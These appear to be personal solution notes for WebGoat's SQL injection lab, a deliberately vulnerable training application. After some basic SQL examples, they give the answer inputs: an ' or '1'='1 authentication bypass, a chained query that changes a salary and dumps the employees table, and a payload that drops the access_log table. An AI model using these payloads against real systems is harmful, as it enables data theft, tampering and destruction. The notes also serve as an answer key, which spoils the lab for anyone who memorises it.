2. (A1) Injection-SQL Injection(intro)

# 2. (A1) Injection-SQL Injection(intro) ###### tags: `webgoat題目` ## 2 What is SQL? :::success select department from employees where first_name = 'Bob' ::: ## 3 Data Manipulation Language (DML) :::success update employees set department = 'Sales' where userid = 89762 ::: ## 4 Data Definition Language (DDL) :::success alter table employees add phone varchar(20); ::: ## 5 Data Control Language (DCL) :::success GRANT ALL PRIVILEGES ON grant_rights TO unauthorized_user ::: ## 9 Try It! String SQL injection :::success ![](https://i.imgur.com/xr8mS5T.png) ::: ## 10 Try It! Numeric SQL injection :::success ![](https://i.imgur.com/fxcFa8D.png) ::: ## 11 Compromising confidentiality with String SQL injection :::success Employee Name:' or '1'='1 Authentication TAN:' or '1'='1 ![](https://i.imgur.com/ESqbhmR.png) ::: ## 12 Compromising Integrity with Query chaining :::success 原本 ![](https://i.imgur.com/j67tMK3.png) Authentication TAN: ' or '1'='1';update employees set SALARY = 90000 where userid = 37648;-- ![](https://i.imgur.com/Cq9BCer.png) Authentication TAN: ' or '1'='1';update employees set SALARY = 90000 where userid = 37648;select * from employees;-- ![](https://i.imgur.com/OitHxeq.png) ::: ## 13 Compromising Availability :::success 1';drop table access_log;-- :::